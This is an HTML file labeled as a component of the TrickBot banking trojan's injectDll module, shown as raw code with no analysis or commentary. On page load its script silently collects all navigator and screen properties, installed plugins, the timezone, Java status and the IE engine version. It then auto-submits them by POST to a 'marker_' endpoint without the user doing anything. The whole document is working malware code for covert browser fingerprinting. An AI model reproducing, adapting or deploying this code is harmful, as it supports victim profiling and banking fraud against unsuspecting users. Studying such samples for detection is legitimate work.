TRICKBOT injectdll64 HTML

marker_.html

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
function ahead()
{
  objs = new Array([navigator, "navigator"], [screen, "screen"]);
  str = new String("");
  for(i = 0; i<objs.length; i++) {
    for(var prop in objs[i][0]) {
      val = objs[i][0][prop];
      if(val === "")
        if(objs[i][1] == "screen") val = 0;
        else val = '""';
      if(typeof(val) == 'object' && val != null)
        st = "[object]";
      else
        st = String(val);
      //if(st[0] == 'f') break;
      st = st.replace(/\n|\r/g, "");
      str += objs[i][1] + "." + prop + " = " + st + "\n";
    }
  }
  //plugins
  str += "plugins.hide = true\n";
  var plugN = navigator.plugins.length;
  for(i = 0; i < plugN; i++) {
    for(var atr in navigator.plugins[i]) {
      str += "plugins." + (i + 1) +  "." + atr + " = " +
             String(navigator.plugins[i][atr]).replace(/\n|\r/g,"") + "\n";
    }
  }
  var d = new Date();
  str += "timezone = " + d.getTimezoneOffset() + "\n";
  str+='navigator.javaEnabled()='+navigator.javaEnabled().toString()+'\n';
  var ua = navigator.userAgent;
  var ie = ua.indexOf('msie')>=0 || ua.indexOf('Trident')>=0;
  if(ie) {
    document.getElementById('ie').value = 'sux';
    str+='xie.ScriptEngineBuildVersion()='+String(ScriptEngineBuildVersion())+'\n';
  } else {
    str+='xie.ScriptEngineBuildVersion()=\n';
  }
  textedit = document.getElementById("data");
  textedit.value = str;
}
</script>
</head>
<body>
 <form name="frm" action="marker_" method="post">
 <textarea id="data" name="values" cols="100" rows="20">

 </textarea><br>
 <input id="ie" name="ie" type="hidden">
 <input type="submit" value="send" >
 </form>
 <script>ahead();frm.submit()</script>
</body>
</html>